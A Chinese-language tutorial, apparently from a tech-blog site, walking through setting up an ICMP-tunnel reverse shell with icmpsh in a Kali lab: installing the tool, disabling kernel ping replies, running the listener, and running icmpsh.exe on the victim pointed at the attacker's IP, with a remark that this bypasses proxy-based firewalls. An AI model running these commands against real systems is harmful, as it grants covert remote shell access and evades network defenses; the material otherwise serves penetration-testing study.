如何利用icmpsh建立icmp隧道反彈shell

發(fā)布時間：2021-12-18 10:11:40 來源：億速云閱讀：272 作者：小新欄目：網(wǎng)絡(luò)管理

這篇文章主要介紹了如何利用icmpsh建立icmp隧道反彈shell，具有一定借鑒價值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓小編帶著大家一起了解一下。

首先在kali上安裝icmpsh軟件，軟件地址https://github.com/inquisb/icmpsh.git

我們可以直接用git克隆過來git clone https://github.com/inquisb/icmpsh.git

然后我們還需要來安裝python-impacket類庫以保證對TCP、UDP、ICMP等協(xié)議的訪問

pip2 install impacket

如何利用icmpsh建立icmp隧道反彈shell

接下來我們還需要關(guān)閉我們之前的ping命令應(yīng)答程序，這樣可以防止內(nèi)核自己對ping包進行響應(yīng)。

sysctl -w net.ipv4.icmp_echo_ignore_all=1

實驗完成后開啟系統(tǒng)ping的話將最后的1改為0即可

如何利用icmpsh建立icmp隧道反彈shell

然后可以在kali上開始監(jiān)聽

python icmpsh_m.py 本機ip 目標ip

如何利用icmpsh建立icmp隧道反彈shell

再把icmpsh.exe傳輸?shù)桨袡C上

如何利用icmpsh建立icmp隧道反彈shell

icmpsh.exe -t 192.168.110.140 -t后面接上攻擊機的ip地址回車

如何利用icmpsh建立icmp隧道反彈shell

接收到shell。由于數(shù)據(jù)是利用PING請求/回復(fù)報文通過網(wǎng)絡(luò)層傳輸，因此并不需要指定服務(wù)或者端口。這種流量是無法被基于代理的防火墻檢測到的，因此這種方式可能繞過一些防火墻規(guī)則。

感謝你能夠認真閱讀完這篇文章，希望小編分享的“如何利用icmpsh建立icmp隧道反彈shell”這篇文章對大家有幫助，同時也希望大家多多支持億速云，關(guān)注億速云行業(yè)資訊頻道，更多相關(guān)知識等著你來學習!

向AI問一下細節(jié)

猜你喜歡